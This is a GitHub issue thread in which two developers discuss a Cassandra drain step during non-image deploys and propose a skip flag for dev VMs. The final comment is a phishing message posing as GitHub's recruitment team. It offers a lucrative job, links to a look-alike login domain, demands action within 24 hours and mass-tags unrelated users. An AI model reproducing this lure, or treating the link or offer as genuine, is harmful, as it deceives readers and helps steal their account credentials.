### ISSUE TITLE
Upstreaming question

### ISSUE THREAD

**Issue by jhohertz** [jhohertz/buri#1]
@inve1 I have a few little fixes as I synced up my fork of buri, wanted to ask you something.

C\* was disabled/drained on the "not image_build" case, which makes the Vagrantfile / all_in_one_\* dev VMs not bring up C*, i've just reverted that locally for now, but in the interest of upstreaming some fixes, what can we do here? Thinking add a boolean for whatever you want to call the behaviour you set in the local dir? (cassandra_drain_on_deploy?). 

Thoughts?

**Comment by inve1** [comment]
yeah that stuff is a little messy now, the purpose of drain there is for upgrades [which is basically the only use case of not image_build for us]. I forget why I commented out the stuff that starts cassandra back up.

A switch sounds good to me if starting cassandra back up is not viable for whatever reason [I'll look into that tomorrow]. otherwise having it start at the end of that role should solve your problem?

**Comment by jhohertz** [comment]
Yup, I might still make a flag in the inverted sense then, cassandra_skip_upgrade_drain, and apply it just to the VM/Image case. I see why you'd want it for in-place updates.

**Comment by 19890843006** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
lazybug0, @lukaszm-rc, @abekthink, @wang-shun, @oussemos, @gerardma, @sstoner, @rakhmad, @isnotavailable, @lendenmc, @Jukipuki, @DokiDarkk, @efyang, @moimikey, @Kgangkhutswe, @antonio-gomez, @windviki, @S0ltan, @pantlive, @rezonanc
